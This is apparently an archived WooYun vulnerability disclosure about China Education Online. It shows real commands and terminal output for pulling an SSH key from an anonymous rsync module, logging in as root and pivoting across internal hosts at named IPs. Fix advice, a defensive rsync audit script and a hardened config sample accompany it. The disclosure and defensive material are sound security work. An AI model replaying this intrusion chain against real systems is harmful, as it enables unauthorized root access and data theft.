WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2013-10-27: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed. 2013-12-11: The vendor has actively ignored the vulnerability; details are now public.
China Education Online (www.eol.cn): one misconfigured service leads to compromise of the whole site
The rsync daemon on 211.151.94.241 exports a module named gen that can be listed and pulled without any credentials:

rsync 211.151.94.241::gen/
The module contains a hosts file that maps out the whole server estate: the public web, bbs, blog, ftp and preview hosts, the database servers (db1, db2), the load balancers (ipvs1, ipvs2, bigip) and the management switches.

cat hosts
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost
202.205.109.141 debian141.eol.cn debian141
# The following lines are desirable for IPv6 capable hosts
# ::1 ip6-localhost ip6-loopback
# fe00::0 ip6-localnet
# ff00::0 ip6-mcastprefix
# ff02::1 ip6-allnodes
# ff02::2 ip6-allrouters
# ff02::3 ip6-allhosts
#
# 211.151.91.98 ipvs2
#166.111.204.69 wowowo
172.16.0.1 switch-01
172.16.0.2 switch-02
172.16.0.3 switch-03
172.16.1.4 switch-04
202.112.0.36 kiwi
67.228.174.9 cucas
#202.205.109.1 rhea
202.205.109.2 www.eol.cn
202.205.109.3 bbs
202.205.109.4 db2.eol.cn
202.205.109.5 jacana
202.205.109.6 butterfly db2
#202.205.109.7 db1
#202.205.109.8 bull
202.205.109.8 crane
202.205.109.9 ibis
202.205.109.10 centra-2
202.205.109.11 donkey2
202.205.109.12 centra
202.205.109.14 home
202.205.109.15 deepblue
202.205.109.17 Ian
202.205.109.18 thorpe
202.205.109.19 blue
202.205.109.20 blog.edu.cn
202.205.109.21 caps-2
202.205.109.22 home2
202.205.109.23 bluebird
202.205.109.24 ceaie.edu.cn blog-2
202.205.109.25 egret
202.205.109.26 thorpe-2
202.205.109.27 blog
202.205.109.28 gaokao4
202.205.109.34 ad01
202.205.109.35 ad02
202.205.109.37 caps
202.205.109.38 ftp snoopy
#202.205.109.45 hehe
202.205.109.46 gaokao4
202.205.109.47 home-limo
202.205.109.48 eolftp
202.205.109.50 node14
202.205.109.51 eagle
202.205.109.52 crane
202.205.109.53 emu
202.205.109.54 donkey
202.205.109.55 bittern
202.205.109.56 pause
202.205.109.57 egret-2
202.205.109.58 kookaburra
202.205.109.59 macaw
202.205.109.69 db1
202.205.109.80 bigip
202.205.109.97 honeyyeater
202.205.109.98 jay
202.205.109.99 preview.eol.cn
202.205.109.100 flamingo
202.205.109.101 flamingo-2
202.205.109.102 preview.eol.cn
202.205.109.103 flycatcher
202.205.109.104 falcon
202.205.109.110 goose
202.205.109.111 hawk
202.205.109.112 heron
202.205.109.117 dove
202.205.109.118 e2900-1
202.205.109.119 e2900-2
202.205.109.120 v240-1
202.205.109.121 v240-2
202.205.109.123 hummingbird
202.205.109.124 hornbill
202.205.109.125 bluelog
202.205.109.127 boatbill
202.205.109.150 bull
202.205.109.155 lion
202.205.109.178 rhea
202.205.109.184 merganser
202.205.109.190 marabou
202.205.109.191 mallard
202.205.109.193 motmot
202.205.109.195 philomela
202.205.109.209 msu
202.205.11.9 break dns2
202.205.11.42 giraffe
202.205.11.43 snake
202.205.11.69 green
202.205.11.70 cyan
202.205.11.71 kingfisher
202.205.11.72 kingfisher-2
202.205.176.34 moeweb1
202.108.198.242 cvae
202.205.7.57 gsy.idc
202.205.7.58 idcmonitor
211.151.91.97 Ian2
211.151.91.98 ipvs2
211.151.91.101 ipvs1
211.151.91.102 alt2
211.151.91.103 gaokao2
211.151.91.104 bbs2
#211.151.91.105 photo
211.157.99.55 photonew
202.205.109.210 photo
211.151.91.107 free.eol.cn-2
211.151.91.108 www.eol.cn-2
#chisa.edu.cn
211.151.90.1 media
211.151.90.2 media
211.151.90.3 chisaiflow
211.151.90.4 fangtan
211.151.90.5 realserver
211.151.89.145 chisachat
211.151.89.185 chisa-db
211.151.89.188 magpie
202.112.35.245 hehe
211.142.41.140 dtmy
The same module also holds an SSH key archive, ssh2.tgz:

164713 10 27 14:01 ssh2.tgz

Unpacking it yields a key pair:

id_rsa id_rsa.pub

Pick one of the hosts from the hosts file above and log in with the private key. It is accepted for root on the load balancer ipvs2, and the root shell history there shows which internal machines the operator habitually hops to; those hops succeed from ipvs2 without a password.
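The two findings above (an exposed hosts inventory and a private key sitting in an anonymous rsync module) are exactly what a routine audit of your own rsync daemons should catch. The following is an added example written for this page, not code from the original report or from eol.cn: it parses the text that `rsync host::` (module list) and `rsync -r --list-only host::module/` (file list) print and flags credential or inventory material. The sample listings embedded in it are constructed to resemble the report; nothing here touches the network, and the module and file names are assumptions.

```python
"""Audit helper for anonymously listable rsync modules.

Added example for this report, not code from the original post or from
eol.cn.  It parses the text printed by `rsync host::` (module list) and
`rsync -r --list-only host::module/` (file list) and flags entries that
must never sit in an anonymous module: SSH private keys, archives of
them, password/secrets files, hosts inventories, shell history.  The
sample listings below are constructed to resemble the report; nothing
here talks to the network.
"""
import re
from dataclasses import dataclass

# One line of `rsync --list-only` output.  rsync 2.x prints a bare size
# ("164713"), rsync 3.x inserts thousands separators ("164,713"); accept both.
_LIST_RE = re.compile(
    r"^(?P<mode>[-dlcbps][-rwxsStT]{9})\s+(?P<size>[\d,]+)\s+"
    r"(?P<date>\d{4}/\d{2}/\d{2}) (?P<time>\d{2}:\d{2}:\d{2}) (?P<name>.+)$"
)

# Filename patterns that mean credential or inventory material, checked in order.
_SENSITIVE = [
    (re.compile(r"(^|/)id_(rsa|dsa|ecdsa|ed25519)$"), "ssh private key"),
    (re.compile(r"\.(pem|key|ppk|p12|pfx)$", re.I), "private key material"),
    (re.compile(r"(^|/)ssh[^/]*\.(tgz|tar\.gz|zip)$", re.I), "archived ssh material"),
    (re.compile(r"(^|/)(rsyncd\.secrets|shadow|\.htpasswd)$"), "password file"),
    (re.compile(r"(^|/)(authorized_keys|known_hosts)$"), "ssh trust file"),
    (re.compile(r"(^|/)\.(bash|zsh|sh)_history$"), "shell history"),
    (re.compile(r"(^|/)hosts$"), "host inventory"),
]


@dataclass
class Entry:
    mode: str
    size: int
    name: str

    @property
    def is_dir(self) -> bool:
        return self.mode.startswith("d")


def parse_modules(text: str) -> dict:
    """`rsync host::` prints one 'name<TAB>comment' line per listable module."""
    modules = {}
    for line in text.splitlines():
        name, tab, comment = line.partition("\t")
        if tab:  # lines without a tab are MOTD text or blank
            modules[name.strip()] = comment.strip()
    return modules


def parse_listing(text: str) -> list:
    """Turn `rsync --list-only` output into Entry objects, skipping chatter and '.'."""
    entries = []
    for line in text.splitlines():
        m = _LIST_RE.match(line)
        if not m or m.group("name") == ".":
            continue
        size = int(m.group("size").replace(",", ""))
        entries.append(Entry(m.group("mode"), size, m.group("name")))
    return entries


def flag_sensitive(entries) -> list:
    """Return (name, reason) for every file whose name looks like credential material."""
    findings = []
    for e in entries:
        if e.is_dir:
            continue
        for pattern, reason in _SENSITIVE:
            if pattern.search(e.name):
                findings.append((e.name, reason))
                break
    return findings


def audit(module_text: str, listings: dict) -> dict:
    """Map each listable module to its findings; a clean module is reported as []."""
    return {name: flag_sensitive(parse_listing(listings.get(name, "")))
            for name in parse_modules(module_text)}


# Constructed sample output (not captured from the host in the report).
SAMPLE_MODULES = "gen            \tgenerated files\nbackup         \t\n"
SAMPLE_LISTING = """\
drwxr-xr-x           4096 2013/10/27 14:01:13 .
-rw-r--r--          12288 2013/10/20 09:12:44 hosts
-rw-r--r--         164713 2013/10/27 14:01:13 ssh2.tgz
-rw-r--r--           1675 2013/10/27 14:00:02 keys/id_rsa
-rw-r--r--            401 2013/10/27 14:00:02 keys/id_rsa.pub
-rw-r--r--      1,048,576 2013/10/26 18:00:00 build/site.tar.gz
drwxr-xr-x           4096 2013/10/26 18:00:00 build
"""

if __name__ == "__main__":
    for module, findings in audit(SAMPLE_MODULES, {"gen": SAMPLE_LISTING}).items():
        print(f"[{module}] {len(findings)} sensitive entries")
        for name, reason in findings:
            print(f"    {name}: {reason}")
```

In practice you feed `audit()` the captured output of `rsync host::` and of `rsync -r --list-only host::module/` for each module it returns; a module that answers the listing at all without `auth users` is already a finding, and the filename patterns only tell you how bad it is. The public half of a key pair (id_rsa.pub) is deliberately not flagged, so the check stays quiet on ordinary deploy trees.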
ssh -i id_rsa [email protected]
ipvs2:~# ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0  2007 ?        00:03:51 init [2]
root         2     1  0  2007 ?        00:04:34 [migration/0]
root         3     1  0  2007 ?        00:01:14 [ksoftirqd/0]
root         4     1  0  2007 ?        00:04:25 [migration/1]
ipvs2:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:C0:9F:38:C1:95
          inet addr:211.151.91.98  Bcast:211.151.91.111  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1915675700 errors:5 dropped:144 overruns:0 frame:3
          TX packets:3921889199 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:2378780214 (2.2 GiB)  TX bytes:1560078143 (1.4 GiB)
          Base address:0xe400 Memory:febc0000-febe0000
eth1      Link encap:Ethernet  HWaddr 00:C0:9F:38:C1:96
          inet addr:10.0.0.98  Bcast:10.0.0.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:495776699 errors:0 dropped:180 overruns:0 frame:0
          TX packets:3661157267 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:849113923 (809.7 MiB)  TX bytes:1267393581 (1.1 GiB)
          Base address:0xe000 Memory:feba0000-febc0000
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:196550863 errors:0 dropped:0 overruns:0 frame:0
          TX packets:196550863 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:117126749 (111.7 MiB)  TX bytes:117126749 (111.7 MiB)
ipvs2:~# history | grep ssh
    5  ssh 10.0.0.39
    6  ssh 10.0.0.43
    8  ssh 10.0.0.43
   10  ssh 10.0.0.39
   11  ssh 10.0.0.43
   12  ssh 10.0.0.39
   14  ssh 10.0.0.43
ipvs2:~# ssh 10.0.0.39
Last login: Sun Sep 29 11:17:10 2013 from 10.0.0.98
Linux cockatoo 2.6.18-6-686 #1 SMP Sat Dec 27 09:31:05 UTC 2008 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
cockatoo:~# ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0  2009 ?        00:07:12 init [2]
root         2     1  0  2009 ?        00:00:00 [migration/0]
root         3     1  0  2009 ?        00:00:10 [ksoftirqd/0]
root         4     1  0  2009 ?        00:01:13 [migration/1]
root         5     1  0  2009 ?        00:01:37 [ksoftirqd/1]
cockatoo:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:16:35:3C:2B:E4
          inet addr:10.0.0.39  Bcast:10.0.0.255  Mask:255.255.255.0
          inet6 addr: fe80::216:35ff:fe3c:2be4/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:2782554477 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1741093814 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:344340646 (328.3 MiB)  TX bytes:86728051 (82.7 MiB)
          Interrupt:201
eth0:0    Link encap:Ethernet  HWaddr 00:16:35:3C:2B:E4
          inet addr:10.0.0.47  Bcast:10.0.0.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:201
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:36885 errors:0 dropped:0 overruns:0 frame:0
          TX packets:36885 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:13680105 (13.0 MiB)  TX bytes:13680105 (13.0 MiB)

This host (cockatoo, the internal content server) has an rsyncd.conf of its own:

[wcmback]
    path = /home/wcmback
    comment = Apache2 Config Files
    hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 202.205.109.119
[site]
    path = /etc/apache2/sites-enabled
    comment = Apache2 Config Files
    hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25
[teacher]
    path = /home/wcm/edu_cn/jiao_shi_zhao_pin_1582
    comment = Whole www htdocs
    hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 121.194.3.180/255.255.255.192
[conf]
    path = /home/ftp_test/conf
    comment = Whole www htdocs
    hosts allow = 10.0.0.0/24 202.205.109.0/24 202.112.0.36 202.205.11.0/25 121.194.3.180/255.255.255.192
[new_files]
    path=/home/wcm/new_files
    comment = eol wcm files
    ignore errors = yes
    read only = no
    hosts allow = 10.0.0.142/32 10.0.0.143/32
[eol_cn]
    path=/home/wcm/eol_cn
    comment = eol wcm files
    ignore errors = yes
    read only = no
    hosts allow = 10.0.0.142/32 10.0.0.143/32
[new_files_images]
    path=/home/wcm/new_files/images/cer.net/gaokao/2011shiti
    comment = eol wcm files
    ignore errors = yes
    read only = no
    hosts allow = 10.0.0.142/32 10.0.0.143/32
[new_files_zt]
    path=/home/wcm/new_files/zt
    comment = eol wcm files
    ignore errors = yes
    read only = no
    hosts allow = 10.0.0.142/32 10.0.0.143/32

Note what these ACLs rely on: every module trusts the whole 10.0.0.0/24 management network (where we are now sitting as root) or public ranges, none of them requires `auth users`, and the four wcm modules are writable (`read only = no`) from 10.0.0.142 and 10.0.0.143, i.e. whoever controls those two hosts can push content straight into the web tree. The export paths are the site's own content directories:

cockatoo:/home/wcm# cd eol_cn/
cockatoo:/home/wcm/eol_cn# ls
04_bys_zhao_pin_4407      fudao_10487  lanqiu_11735                               te_jian_3992
04_xiaoyuan_cj_1978       fudao_10499  lao_dong_fa_yuan_4385                      team_2012
04chun_jie_kuai_xun_1975  fudao_10511  lao_dong_he_tong_9642                      teams_5149
04chun_jie_zhuan_ti_1974  fudao_10522  lao_dong_he_tong_jie_chu_zhong_zhi_4391    tebie_ch_4107
05_10_2267                fudao_10533  lao_dong_he_tong_qian_ding_bian_geng_4392  tebie_ch_4520
05_11_2268                fudao_10547  laow_1889                                  tepjs_4440
Now try a machine on an entirely different network (121.194.3.0/24, one of the ranges whitelisted in the rsyncd.conf above) with the same key:

ssh -i i 121.194.3.201
Last login: Sun Oct 27 14:52:07 2013 from 202.205.109.80
Linux xinxi2009-01 2.6.18-6-amd64 #1 SMP Sun Feb 10 17:50:19 UTC 2008 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
xinxi2009-01:~# ifconfig
eth2      Link encap:Ethernet  HWaddr 00:23:8B:A9:AA:10
          inet addr:121.194.3.201  Bcast:121.194.3.255  Mask:255.255.255.0
          inet6 addr: fe80::223:8bff:fea9:aa10/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:11859164102 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15624895490 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:1655586719825 (1.5 TiB)  TX bytes:19411809874839 (17.6 TiB)
          Base address:0xac00 Memory:fcde0000-fce00000
eth3      Link encap:Ethernet  HWaddr 00:23:8B:A9:AA:11
          inet addr:118.186.63.12  Bcast:118.186.63.127  Mask:255.255.255.128
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:98621 errors:0 dropped:0 overruns:0 frame:0
          TX packets:27891 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:8199957 (7.8 MiB)  TX bytes:18628920 (17.7 MiB)
          Base address:0xa800 Memory:fcd80000-fcda0000
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:17767291494 errors:0 dropped:0 overruns:0 frame:0
          TX packets:17767291494 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:43181600100598 (39.2 TiB)  TX bytes:43181600100598 (39.2 TiB)
xinxi2009-01:~# id
uid=0(root) gid=0(root) groups=0(root)

The same private key gives root on a third host in a third address range (the one that has pushed 17.6 TiB out of eth2), which means one shared root key is trusted across the estate.
The problem is too serious; I stopped here.

Fix suggestion: security requires great care. Concretely: lock the rsync daemon down (restrict each module with `hosts allow`/`hosts deny`, require `auth users` backed by a `secrets file`, hide the module list with `list = no`, and keep modules `read only` unless a specific writer needs them); keep private keys, key archives and host inventories out of any exported directory; treat the leaked id_rsa as compromised, remove its public half from every authorized_keys that accepts it and issue per-host keys instead of one shared root key; and review the auth logs on the hosts named in the hosts file for logins made with that key.

Vendor response: could not reach the vendor, or the vendor actively refused.
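To make the hardening concrete, here is an added example configuration, written for this page and not taken from the original report or from eol.cn: the weak shape of a module that behaves like the exposed `gen` module (the report does not show that module's actual config, so the weak block is an assumption about what it looked like) beside the corrected form. The paths, module names and the `deploy` user are placeholders.

```ini
# --- weak: what an anonymously listable, anonymously readable module looks like ---
# No global restrictions, no auth, module advertised to anyone who reaches 873/tcp.
[gen]
    path = /data/gen
    comment = generated files

# --- hardened ---
use chroot = yes
uid = nobody
gid = nogroup
list = no                 # module names are not revealed by "rsync host::"
read only = yes           # a module must opt in to writes, never the reverse
strict modes = yes        # refuse to start if the secrets file is world-readable

[gen]
    path = /data/gen
    comment = generated files
    hosts allow = 10.0.0.0/24         # only the network that legitimately pulls it
    hosts deny = *
    auth users = deploy               # rsync user, unrelated to any system account
    secrets file = /etc/rsyncd.secrets  # "deploy:<password>", root-owned, mode 0600
    # Even a trusted puller must not be able to pick up key or inventory material.
    exclude = id_rsa id_dsa id_ecdsa id_ed25519 *.pem *.key *.tgz *.tar.gz hosts
```

The `hosts allow` line only narrows who can talk to the module; `auth users` with a secrets file is what stops an attacker who already sits on the allowed network (as the report shows happens once one host falls). `exclude` is a backstop, not a substitute for never placing keys in an exported tree.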